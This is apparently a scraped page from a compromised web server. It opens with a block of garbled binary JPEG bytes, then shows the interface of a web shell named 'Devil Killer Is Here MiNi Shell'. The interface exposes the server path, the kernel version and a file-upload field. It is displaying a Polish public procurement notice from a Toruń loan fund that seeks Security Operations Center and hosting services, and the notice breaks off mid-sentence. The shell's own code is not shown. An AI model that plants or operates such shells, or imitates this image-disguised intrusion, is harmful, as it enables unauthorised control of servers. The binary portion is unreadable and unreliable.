JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230807/0034379901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi Security Operations Center w zakresie cyberbezpieczeństwa wraz z zapleczem teleinformatycznym w modelu usługowym.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KUJAWSKO-POMORSKI FUNDUSZ POŻYCZKOWY SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">K-PFP Sp. z o.o</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871723445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Henryka Sienkiewicza 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@kpfp.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://kpfp.org.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Celem działalności Spółki jest wspieranie powstawania i rozwoju przedsiębiorczości oraz rozwoju ekonomii społecznej na terenie województwa kujawsko-pomorskiego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi Security Operations Center w zakresie cyberbezpieczeństwa wraz z zapleczem teleinformatycznym w modelu usługowym.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-117128ad-34fe-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00343799</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kpfp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kpfp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>https://platformazakupowa.pl/pn/kpfp.<br/>Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z Platformy (adres:<br/>https://platformazakupowa.pl/pn/kpfp). Składając ofertę Wykonawca akceptuje Regulamin platformazakupowa.pl dla Użytkowników<br/>(Wykonawców).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/kpfp</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Niniejsza informacja przekazywana jest zgodnie z art. 13 i art. 14 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenia o ochronie danych) (Dz. Urz. UE L 119 z 4.05.2016, str. 1), zwanego dalej jako RODO:<br/>1. Administratorem Państwa danych osobowych jest Kujawsko-Pomorski Fundusz Pożyczkowy Sp. z o.o. z siedzibą w Toruniu (87 -<br/>100) przy ul. Sienkiewicza 38. Z Administratorem można się skontaktować poprzez adres e-mail: daneosobowe@kpfp.org.pl<br/>2. Dane kontaktowe Inspektora Ochrony Danych: Andrzej Narolewski iod@anars.pl<br/>3. Dane osobowe przekazane przez Wykonawcę przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na podstawie zgody wyrażonej poprzez akt uczestnictwa w postępowaniu oraz:<br/>a) art. 6 ust. 1 lit. c RODO, gdyż jest to niezbędne do wypełnienia obowiązku prawnego ciążącego na Zamawiającym, wynikającego<br/>min. z przepisów ustawy Prawo zamówień publicznych (Pzp) oraz aktów wykonawczych, a także ustawy o narodowym zasobie<br/>archiwalnym i archiwach; a w przypadku podpisania umowy lub zlecenia wykonania zamówienia, również na podstawie ordynacji<br/>podatkowej oraz przepisów rachunkowo – księgowych, oraz:<br/>b) art. 6 ust. 1 lit. b RODO, gdyż jest to niezbędne do podjęcia działań przed zawarciem umowy oraz do wykonania umowy;<br/>c) art. 6 ust. 1 lit. f RODO, ze względu na uzasadnione interesy Zamawiającego, w szczególności w celu ustalenia, obrony oraz<br/>dochodzenia roszczeń.<br/>4. Przetwarzaniu podlegają:<br/>a) dane kontaktowe oraz inne niezbędne do udziału w postępowaniu oraz podpisania i realizacji umowy;<br/>b) dane zawarte w dokumentach potwierdzających uprawnienia lub doświadczenie.<br/>5. Dane pozyskane mogą zostać bezpośrednio od Wykonawcy, jak i ze źródeł publicznie dostępnych, tj. KRS, CEiDG, strony<br/>internetowe, itp.<br/>6. Państwa dane osobowe mogą być przekazywane wyłącznie podmiotom upoważnionym na podstawie przepisów prawa lub<br/>podmiotom przetwarzającym dane na zlecenie Zamawiającego na podstawie zawartych umów.<br/>7. Państwa dane osobowe będą przechowywane w oparciu o zasady obowiązujące Zamawiającego wynikające z przepisów prawa,<br/>nie dłużej niż jest to niezbędne w ww. celach.<br/>8. Posiadają Państwo prawo do:<br/>a) informacji w zakresie operacji przetwarzania danych osobowych oraz dostępu do nich;<br/>b) sprostowania (poprawienia) danych, usunięcia, ograniczenia przetwarzania;<br/>c) przeniesienia danych;<br/>d) złożenia sprzeciwu oraz cofnięcia zgody, o ile mają zastosowanie, na zasadach określonych w RODO – wystarczy zgłosić się do<br/>(proszę wskazać mail do komórki zajmującej się postępowaniem)<br/>e) złożenia skargi do organu nadzorczego: Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00- 193 Warszawa;<br/>f) skorzystania ze środków ochrony prawnej przed właściwym sądem.<br/>9. Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego lub realizacją umowy. Konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp.<br/>10. W przypadku postępowań o udzielenie zamówienia wyłączonych spod stosowania przepisów ustawy Pzp, podanie danych jest<br/>dobrowolne, jednakże ich brak uniemożliwi udział w postępowaniu.<br/>11. Na podstawie tak zebranych danych nie będą podejmowane zautomatyzowane decyzje.<br/>12. Państwa dane nie będą podlegały profilowaniu, tj. nie będą podlegały automatycznemu przypisywaniu lub przewidywaniu<br/>Państwa zachowań, preferencji, postaw, potrzeb czy sposobu życia.<br/>13. Państwa dane osobowe nie będą przekazywane podmiotom z siedzibą poza Europejskim Obszarem Gospodarczym, tj. do<br/>państw trzecich lub organizacji międzynarodowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku postępowań o udzielenie zamówienia wyłączonych spod stosowania przepisów ustawy Pzp, podanie danych jest dobrowolne, jednakże ich brak uniemożliwi udział w postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOA.382.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowa usługa w zakresie cyberbezpieczeństwa wraz z zapewnienia dostępu do<br/>bezpiecznej i wysokodostępnej infrastruktury teleinformatycznej w modelu usługowym wraz z usługami uzupełniającymi,<br/>zwana dalej Usługą. Usługa składa się z Usługi Podstawowej i Usług Dodatkowych. W ramach Usługi Podstawowej<br/>Wykonawca zobowiązuje się:<br/>1) świadczyć przez cały okres trwania umowy usługę SOC w zakresie cyberbezpieczeństwa, mającą na celu ochronę przed<br/>cyberzagrożeniami;<br/>2) udostępnić na czas realizacji umowy infrastrukturę teleinformatyczną CPD wraz z mocą obliczeniową i przestrzenią<br/>dyskową oraz oprogramowaniem zgodnie z określonymi przez Zamawiającego wymaganiami w terminie do 10 dni<br/>roboczych od dnia podpisania umowy;<br/>3) zapewnić pełną obsługę i realizację bezprzerwowej migracji systemów teleinformatycznych i aplikacji oraz danych<br/>cyfrowych z obecnie wykorzystywanych zasobów teleinformatycznych Zamawiającego do zasobów Wykonawcy<br/>dostarczonych w ramach przedmiotowego zamówienia w terminie do 10 dni roboczych od dnia podpisania umowy, wraz z<br/>późniejszym utrzymaniem i zarządzaniem dostarczoną infrastrukturą teleinformatyczną w celu prawidłowego działania<br/>Usługi zgodnie z określonymi parametrami;<br/>4) zapewnić na czas realizacji umowy usługę kopii zapasowej udostępnionej infrastruktury teleinformatycznej zgodnie z<br/>określonymi przez Zamawiającego wymaganiami w terminie do 10 dni roboczych od dnia podpisania umowy;<br/>5) zapewnić na czas realizacji umowy dostęp do aplikacji biurowych wraz z pocztą email i jej uruchomieniem w terminie do<br/>10 dni roboczych od dnia podpisania Umowy oraz przeprowadzić migrację z obecnie wykorzystywanego systemu poczty<br/>email;<br/>6) zapewnić na czas realizacji umowy usługę AD wraz z obsługą dla wszystkich Użytkowników w terminie do 10 dni<br/>roboczych od dnia podpisania umowy;<br/>7) zapewnić na czas realizacji umowy łącza internetowe w terminie do 10 dni roboczych od podpisania umowy.<br/>W ramach Usług Dodatkowych Wykonawca zobowiązuje się:<br/>Na każdorazowe wezwanie Zamawiającego w trybie następnego dnia roboczego dostarczyć Usługi Dodatkowe w ilości<br/>wskazane w ramach szczegółowego opisu Usługi Podstawowej, ale nie przekraczające ilości wskazanych w ramach<br/>szczegółowego opisu usługi uzupełniającej.<br/>Z uwagi na potrzebę ochrony przed cyberzagrożeniami Zamawiający oczekuję realizacji usługi SOC. Usługa musi być<br/>realizowana w oparciu o narzędzia i systemy teleinformatyczne funkcjonujące w ramach infrastruktury CPD spełniającej<br/>wymogi określone dla CPD .<br/>Usługa SOC musi zawierać poniższe elementy do realizacji:<br/>- Audyt bezpieczeństwa infrastruktury IT w siedzibie głównej Zamawiającego – wykonanie 2 audytów w okresie trwania<br/>umowy, w terminie uzgodnionym z Zamawiający.<br/>- Audyt bezpieczeństwa sieci bezprzewodowych w siedzibie głównej Zamawiającego – wykonanie 2 audytów w okresie<br/>trwania umowy, w terminie uzgodnionym z Zamawiający.<br/>- Testy socjotechniczne – wykonanie 2 testów w okresie trwania umowy, w terminie uzgodnionym z Zamawiający.<br/>- Skanowanie infrastruktury wewnętrznej pod kątem podatności – usługa ma być realizowana w trybie ciągłym w trakcie<br/>trwania umowy.<br/>- Analiza infrastruktury zewnętrznej pod kątem luk bezpieczeństwa – usługa ma być realizowana w trybie ciągłym w trakcie<br/>trwania umowy.<br/>Z uwagi na potrzebę ochrony przed cyberzagrożeniami Zamawiający oczekuję w terminie do 10 dni roboczych od<br/>podpisania umowy wdrożenia ochrony antywirusowej dla 80 szt. stacji roboczych.<br/>Infrastruktura teleinformatyczna CPD:<br/>1) Z uwagi na potrzebę wysokiej dostępności infrastruktury teleinformatycznej CPD na potrzeby świadczonych usług,<br/>Zamawiający oczekuje, aby proponowane rozwiązanie spełniało najwyższe, dostępne na terenie Unii Europejskiej standardy bezpieczeństwa informatycznego w trakcie trwania realizacji całego zamówienia. Wymagania CPD są obligatoryjne.<br/>Wykluczone jest częściowe spełnianie któregokolwiek wymogu. Zamawiający na etapie oceny ofert, a także realizacji Usługi<br/>zastrzega sobie możliwość weryfikacji i wiarygodnego udokumentowania przez Wykonawcę spełniania każdego z wymogów<br/>określonych w OPZ w punkcie 5 poniżej. Wymogi CPD muszą być spełnione przez cały okres trwania umowy.<br/>2) Zamawiający oczekuje, że CPD posiada odpowiednie zabezpieczenia fizyczne i organizacyjne zapewniające m.in.<br/>bezpieczeństwo przetwarzanych danych Zamawiającego. Wykonawca ponosi odpowiedzialność w zakresie bezpieczeństwa<br/>informacji i danych przechowywanych na wykorzystanej infrastrukturze teleinformatycznej CPD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72240000-9 - Usługi analizy systemu i programowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">72320000-4 - Usługi bazy danych</p> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <p class="mb-0">72317000-0 - Usługi przechowywania danych</p> <p class="mb-0">72254100-1 - Usługi w zakresie testowania systemu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji:<br/>a) Prawo opcji obejmuje świadczenie usług obejmujących:<br/> Ochronę antywirusową zgodnie z parametrami w pkt. 3.1., 2) OPZ – maksymalnie dodatkowo 50 nowych stacji roboczych.<br/> Poczta email i pakiet aplikacji biurowych zgodnie z parametrami w pkt. 3.5. OPZ - maksymalnie dodatkowo 50 nowych kont<br/>pocztowych.<br/>b) Zamawiającemu przysługuje prawo skorzystania z opcji, zgodnie z art. 441 ustawy Pzp.<br/>c) W przypadku skorzystania przez Zamawiającego z prawa opcji, Wykonawcy przysługiwać będzie wynagrodzenie z tytułu<br/>wykonania zamówienia objętego prawem opcji obliczone na podstawie ceny jednostkowej wskazanej przez Wykonawcę w<br/>Formularzu ofertowym oraz zakresu wykonanej przez Wykonawcę usługi w ramach opcji.<br/>d) W celu skorzystania z prawa opcji Zamawiający przekaże Wykonawcy oświadczenie o zamiarze skorzystania z prawa<br/>opcji, w formie pisemnej w terminie nie krótszym niż 7 dni przed skorzystaniem z tego prawa.<br/>e) Zamawiający może skorzystać z prawa opcji wielokrotnie - do momentu wyczerpania maksymalnego zakresu opcji<br/>określonego w pkt a).<br/>f) Zlecenie wykonania zamówienia objętego prawem opcji nie będzie wymagało zawarcie odrębnej umowy z Wykonawcą.<br/>g) Wykonawcy nie przysługuje żadne roszczenie w stosunku do Zamawiającego<br/>w przypadku, gdy Zamawiający z prawa opcji nie skorzysta. Realizacja zamówienia objętego opcją jest wyłącznie<br/>uprawnieniem Zamawiającego.<br/>h) W zakresie realizacji zamówienia objętego prawem opcji zapisy umowy, jaka zostanie zawarta w wyniku rozstrzygnięcia<br/>przedmiotowego postępowania, stosuje się odpowiednio. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający<br/>przewiduje udzielenie, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, wykonawcy któremu zostanie udzielone<br/>zamówienie, zamówień polegających na powtórzeniu podobnych usług, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>2. Łączna wartość zamówień udzielanych na podstawie art. 214 ust. 1 pkt 7 nie przekroczy 50 % wartości zamówienia<br/>podstawowego.<br/>3. Zakres zamówień podobnych może obejmować świadczenie usług objętych zakresem podstawowym zamówienia na wyznaczony<br/>przez Zamawiającego okres świadczenia usługi, objętej zamówieniem na usługi podobne. Zakres zleconych usług nie przekroczy<br/>wartości, o której mowa w ust. 2.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cenę oferty stanowi maksymalne wynagrodzenie za wykonanie zamówienia w pełnym zakresie.<br/>2. Wykonawca uwzględniając wszystkie wymogi, o których mowa w SWZ, zobowiązany jest w cenie brutto ująć wszelkie koszty<br/>niezbędne dla prawidłowego i pełnego wykonania przedmiotu zamówienia.<br/>3. Cena oferty winna być podana w złotych polskich liczbowo i słownie.<br/>4. Każdy z wykonawców może zaproponować tylko jedną cenę oferty.<br/>5. Informacja o obowiązku podatkowym:<br/>Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o<br/>podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i<br/>usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>Wykonawca, składając ofertę, informuje Zamawiającego w „Formularzu oferty”, czy wybór oferty będzie prowadzić do powstania u<br/>Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie<br/>prowadzić do jego powstania, wskazując ich wartość bez kwoty podatku oraz wskazując stawkę podatku od towarów i usług, która<br/>zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">standard świadczonych usług</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">SLA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt 4 ustawy Pzp).<br/>2. W zakresie warunku dotyczącego zdolności technicznej lub zawodowej Zamawiający uzna warunek za spełniony, jeżeli<br/>wykonawca:<br/>wykaże że w okresie ostatnich 3 (trzech) lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub o charakterze<br/>ciągłym również wykonuje należycie:<br/>a) co najmniej jedną usługę o wartości minimum 500.000,00 zł brutto polegający na realizacji rozwiązania informatycznego<br/>dotyczącego usługi SOC, lub<br/>b) co najmniej trzy usługi o wartości co najmniej 400.000,00 zł brutto każda, polegających na świadczeniu usług<br/>udostępniania infrastruktury teleinformatycznej centrum przetwarzania danych wraz z mocą obliczeniową;<br/>oraz<br/>dysponuje lub 